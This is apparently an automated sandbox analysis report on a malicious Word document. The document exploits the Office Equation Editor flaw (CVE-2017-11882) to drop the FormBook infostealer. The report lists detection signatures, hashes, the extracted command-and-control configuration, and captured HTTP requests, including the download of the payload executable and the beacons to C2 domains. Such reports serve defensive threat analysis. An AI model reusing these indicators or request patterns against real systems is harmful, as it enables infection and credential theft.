Analysis Report INQUIRY-PO3010773..EPR55804.doc

Overview

General Information

Sample Name: INQUIRY-PO3010773..EPR55804.doc
Analysis ID: 432659
MD5: ca66b439a178c115e4a0634da09c27ce
SHA1: 076b862373c50f30b121b8f64b60673434ca9b90
SHA256: 4e0fefa37d9dc5faec3e64cc9129b8004fd349b209228a97101c66b30cde4e10
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe Avira: detection malicious, Label: HEUR/AGEN.1141549
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Avira: detection malicious, Label: HEUR/AGEN.1141549
Found malware configuration
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.studiooculto.com/n8ud/"], "decoy": ["certification-plus.com", "linkedoutbook.com", "bethesdalashes.com", "blazingthenet.com", "lohmanphotogallery.com", "solidlinks.info", "alvingohproperty.com", "hometheaterplanning.com", "beoke.com", "ddthi.com", "floridamotorcyclemasons.net", "stither.com", "majorhumanities.com", "palpaynaira.com", "webossgoo.com", "thebrck.com", "crackhook.com", "363dahlia.com", "mybusiness-plus.com", "seatachawaiianbarbecue.com", "uoekiqliea.net", "zyslz.com", "frightvision.online", "gordonenergysolutions.com", "matthewcoyte.com", "hackingnews.info", "royallondonhair.com", "thegioirc.com", "856380588.xyz", "popitara.com", "luisxe.info", "cbdthc.domains", "869bernardilane.com", "airikit.com", "centraldomusmatera.com", "onlinecreditnow.com", "ilamaths.com", "janeharriganhorn.com", "fullapologies.com", "xpfisioterapia.com", "spring-boot.com", "wrighttransportllc.com", "nemahealthcare.com", "taxikuka.com", "promoterss.com", "kirklandtroll.com", "aviationbrothers.com", "fylldagenebergen.com", "vycocover.com", "cookingsecret.net", "intentguild.com", "athenalim.com", "nothingoingapart.info", "neurosene.com", "doctorelizabethwise.com", "lalamasks.cloud", "livemaharashtra24.com", "catrinettealyssandre.com", "wovkreations.com", "piapiadine.com", "uebfaushb.com", "curlupanddyesc.com", "seniorbenefits.support", "didyouswipe.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\sirt3512.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: INQUIRY-PO3010773..EPR55804.doc ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.control.exe.b0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.0.sirt3512.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.control.exe.b0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.sirt3512.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.sirt3512.exe.1b0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.sirt3512.exe.857418.2.unpack Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Unpacked PE file: 4.2.sirt3512.exe.1220000.3.unpack
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: control.pdb source: sirt3512.exe, 00000005.00000002.2132218595.0000000000839000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: sirt3512.exe, control.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4x nop then imul eax, dword ptr [ebp-20h], F66207D0h 4_2_001BD7F0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4x nop then pop ebx 5_2_00407B0A
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop ebx 7_2_000E7B0A
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: carbinz.ga
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.studiooculto.com/n8ud/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Jun 2021 14:31:06 GMTContent-Type: application/x-msdownloadContent-Length: 1116672Last-Modified: Thu, 10 Jun 2021 03:42:12 GMTConnection: keep-aliveETag: "60c18a14-110a00"Accept-Ranges: bytes
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ud/?OR-pi=zdrThtgHqt3&4hxpznj0=uGv12cOEt0iW8+7qxEh+/IYx8LbagoRp4MqXc8oHizx2MfFB1iSeUlEQ8HXQ5dQCk04DkA== HTTP/1.1Host: www.869bernardilane.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ud/?4hxpznj0=4BFY1+RZf6BraFjHhRNVJ13lzvhcvhDXEvQAp0BhQKRdCzLT+26MMJqFH8vg/bSXx7Qe0w==&OR-pi=zdrThtgHqt3 HTTP/1.1Host: www.363dahlia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.98.145.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View ASN Name: TUCOWS-3CA
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /modex/sirtx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gaConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B24510-30CA-4646-ACFF-79FC9E14ADCB}.tmp
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: carbinz.ga
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000000.2097589761.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
